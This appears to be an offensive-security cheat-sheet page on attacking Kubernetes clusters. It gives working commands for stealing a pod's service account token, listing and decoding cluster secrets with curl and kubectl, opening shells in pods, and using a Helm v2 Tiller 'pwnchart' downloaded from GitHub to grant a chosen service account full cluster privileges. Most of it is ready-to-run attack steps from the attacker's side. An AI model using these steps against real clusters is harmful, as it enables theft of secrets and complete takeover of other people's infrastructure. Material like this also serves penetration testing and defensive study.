Kubernetes

Container Orchestration for managing big scalable infrastructure of containerized applications

The way of attacking a Kubernetes cluster is similar to attacking Windows Active Directory:

  1. Find a vulnerability in an application (RCE, SSRF, SSH, etc.)

  2. Perform Lateral Movement to access more pods and nodes with higher privileges

  3. Reach the Highest Privileges to do anything an attacker wants

Initial Access

The /var/run/secrets/kubernetes.io/serviceaccount/token file (sometimes /run instead of /var/run) on a Kubernetes pod contains a Service Account Token in the form of a JSON Web Token. It can be decoded, and the payload tells you exactly who or what the account belongs to:

This token can be used for Lateral Movement in the rest of the cluster and interact with the API server, and due to being in the internal network, a lot more servers are now accessible. A few useful endpoints are:

  • /api/v1/namespaces/default/pods/: List all pods

  • /api/v1/namespaces/default/secrets/: List all secrets

These can be requested with the found Service Account Token (JWT) as a header:

curl -v -H 'Authorization: Bearer <TOKEN>' https://<API_SERVER>/...

If the machine has kubectl installed (or you download a static binary), it is also possible to simply use it instead of manual curl commands. Some similar and useful commands are:

# # List everything
$ kubectl get all --token $TOKEN --server $API_SERVER --insecure-skip-tls-verify
$ kubectl get pods     # List pods
$ kubectl get secrets  # List secrets

# # Execute an interactive shell with a pod
$ kubectl exec <POD_NAME> --stdin --tty  -- /bin/bash
# # Get and decode a secret
$ kubectl get secret <SECRET_NAME> -o jsonpath='{.data.*}' | base64 -d

Helm V2 - Tiller

At the time of writing, Helm V3 is the newest version, but many clusters still use the outdated V2. This bears some serious security considerations as the Tiller component has full cluster administration RBAC privileges, which can be exploited if we have access to helm.

Taken from here, you can test the TCP connection on port 44134 and verify the version:

$ nc -v tiller-deploy.kube-system 44134
Connection to tiller-deploy.kube-system 44134 port [tcp/*] succeeded!
$ helm version
Client: &version.Version{SemVer:"v2.0.0", GitCommit:"ff52399e51bb880526e9cd0ed8386f6433b74da1", GitTreeState:"clean"}
Server: &version.Version{SemVer:"v2.0.0", GitCommit:"b0c113dfb9f612a9add796549da66c0d294508a3", GitTreeState:"clean"}

To start exploiting this, a ready-to-use template exists that requires some minimal changes:

$ curl -o ./pwnchart.tgz https://github.com/Ruil1n/helm-tiller-pwn/raw/main/pwnchart-0.1.0.tgz
$ tar xvf ./pwnchart.tgz

Inside the newly created ./pwnchart folder there the two clusterrole.yaml and clusterrolebiniding.yaml files in the templates/ folder require the following change:

templates/*.yaml
- apiVersion: rbac.authorization.k8s.io/v1beta1
+ apiVersion: rbac.authorization.k8s.io/v1

As well as the values.yml file where the name: key needs to be changed to the name of the service account token which will gain all privileges. Make sure this is a service account you own:

- name: default
+ name: compromised-user

Finally, after setting this up you can run the command to install it:

helm --host tiller-deploy.kube-system:44134 install --name pwnchart ./pwnchart

After doing so, the compromised-user token will have every permission on the cluster and can access anything. Check kubectl get all for a list of everything.

Last updated